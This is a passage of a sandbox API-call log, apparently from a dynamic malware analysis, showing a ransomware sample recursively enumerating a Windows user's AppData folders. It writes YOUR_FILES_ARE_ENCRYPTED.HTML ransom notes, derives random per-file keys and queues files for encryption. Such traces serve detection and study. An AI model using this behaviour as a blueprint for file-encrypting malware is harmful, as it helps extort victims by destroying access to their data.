(lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.998] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.999] CloseHandle (hObject=0x32c) returned 1 [0115.999] GetProcessHeap () returned 0x600000 [0115.999] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.999] GetProcessHeap () returned 0x600000 [0115.999] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.000] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62527d6a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62527d6a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62527d6a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0116.000] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.000] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalState") returned 91 [0116.000] GetProcessHeap () returned 0x600000 [0116.000] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.001] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalState" [0116.001] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalState\\*" [0116.001] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62527d6a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62527d6a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62527d6a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.002] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62527d6a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62527d6a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62527d6a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0116.002] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62527d6a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62527d6a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62527d6a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0116.002] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.002] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0116.002] GetProcessHeap () returned 0x600000 [0116.002] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.003] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.005] CloseHandle (hObject=0x32c) returned 1 [0116.005] GetProcessHeap () returned 0x600000 [0116.005] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.005] GetProcessHeap () returned 0x600000 [0116.005] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.006] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62848d25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62848d25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62848d25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy", cAlternateFileName="MICROS~1.0_N")) returned 1 [0116.006] StrStrIW (lpFirst="Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.006] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy") returned 134 [0116.006] GetProcessHeap () returned 0x600000 [0116.006] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.007] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy" [0116.007] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\*" [0116.007] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62848d25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62848d25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62848d25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.007] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62848d25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62848d25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62848d25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0116.007] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62848d25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62848d25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62848d25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0116.007] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.007] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore") returned 150 [0116.007] GetProcessHeap () returned 0x600000 [0116.007] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.009] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore" [0116.009] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\*" [0116.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62848d25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62848d25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62848d25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f15a0, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0116.010] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62848d25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62848d25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62848d25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f15a0, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0116.010] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62848d25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6289529c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6289529c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x6f15a0, dwReserved1=0x631190, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0116.010] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.010] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 170 [0116.011] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0116.011] lstrlenW (lpString=".dat") returned 4 [0116.011] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0116.011] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0116.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\microsoft.lockapp_10.0.10586.0_neutral__cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0116.011] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=16384) returned 1 [0116.011] GetProcessHeap () returned 0x600000 [0116.011] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0116.015] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="22") returned 2 [0116.015] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="0B") returned 2 [0116.015] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="AE") returned 2 [0116.015] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="04") returned 2 [0116.015] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="E7") returned 2 [0116.015] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="6E") returned 2 [0116.015] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="AA") returned 2 [0116.015] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="EF") returned 2 [0116.015] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="99") returned 2 [0116.015] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="82") returned 2 [0116.015] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="1F") returned 2 [0116.015] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="92") returned 2 [0116.015] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="B0") returned 2 [0116.015] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="DF") returned 2 [0116.015] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="F3") returned 2 [0116.015] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="F5") returned 2 [0116.015] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="C4") returned 2 [0116.015] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="C3") returned 2 [0116.016] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="F2") returned 2 [0116.016] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="7E") returned 2 [0116.016] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="26") returned 2 [0116.016] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="3C") returned 2 [0116.016] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="CA") returned 2 [0116.016] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="AF") returned 2 [0116.016] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="6B") returned 2 [0116.016] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="C5") returned 2 [0116.016] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="17") returned 2 [0116.016] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="ED") returned 2 [0116.016] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="43") returned 2 [0116.016] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="2C") returned 2 [0116.016] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="46") returned 2 [0116.016] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="68") returned 2 [0116.017] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" [0116.017] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.017] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0116.017] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x62848d25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62848d25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62848d25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x6f15a0, dwReserved1=0x631190, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0116.017] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.017] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 175 [0116.017] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0116.017] lstrlenW (lpString=".LOG1") returned 5 [0116.017] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0116.017] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x62848d25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62848d25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62848d25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f15a0, dwReserved1=0x631190, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0116.017] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.017] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 175 [0116.017] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0116.017] lstrlenW (lpString=".LOG2") returned 5 [0116.017] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0116.017] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x62848d25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62848d25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62848d25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f15a0, dwReserved1=0x631190, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0116.017] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0116.018] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 180 [0116.018] GetProcessHeap () returned 0x600000 [0116.018] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\microsoft.lockapp_10.0.10586.0_neutral__cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0116.019] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.023] CloseHandle (hObject=0x324) returned 1 [0116.025] GetProcessHeap () returned 0x600000 [0116.025] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.025] GetProcessHeap () returned 0x600000 [0116.025] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.026] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62848d25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62848d25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62848d25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0116.026] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.026] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 164 [0116.026] GetProcessHeap () returned 0x600000 [0116.026] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.026] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\microsoft.lockapp_10.0.10586.0_neutral__cw5n1h2txyewy\\your_files_are_encrypted.html"), 